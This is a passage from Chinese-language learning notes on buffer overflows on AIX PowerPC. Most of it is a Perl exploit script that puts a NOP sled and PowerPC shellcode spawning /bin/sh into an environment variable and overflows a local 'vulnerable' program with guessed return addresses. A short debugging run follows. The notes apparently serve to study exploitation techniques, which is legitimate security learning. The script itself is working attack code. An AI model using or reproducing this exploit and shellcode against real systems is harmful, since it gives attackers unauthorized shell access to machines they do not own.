.
. v . 我们能够比较准确的猜测环境变量的地址,参考前面的调试流程和watercloud的一些AIX攻击程序,想当然的写一个攻击程序:-bash-2.05b$ cat exploit.pl
#!/usr/bin/perl
#
# exploit.pl
# exploit program vulnerable$CMD="/home/san/vulnerable";$SHELLCODE=
"\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd". # /* bnel <shellcode> */
"\x7f\xe8\x02\xa6". # /* mflr r31 */
"\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08". # /* cal r3,-248(r31) */
"\x38\x9f\xff\x10". # /* cal r4,-240(r31) */
"\x90\x7f\xff\x10". # /* st r3,-240(r31) */
"\x90\xbf\xff\x14". # /* st r5,-236(r31) */
"\x88\x5f\xff\x0f". # /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f". # /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42". # /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02". # /* svca */
"/bin/sh".
"\x05";$NOP="\x60\x60\x60\x60"x800;
%ENV=();$ENV{CCC}=$NOP.$SHELLCODE;
$ret=system $CMD ,"\x2f\xf2\x2b\x40"x11;调试一下:-bash-2.05b$ ./exploit.pl/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@在另一个终端用gdb调试vulnerable:-bash-2.05b$ ps aux
关键词:AIX PowerPC体系结构及其溢出技术学习笔记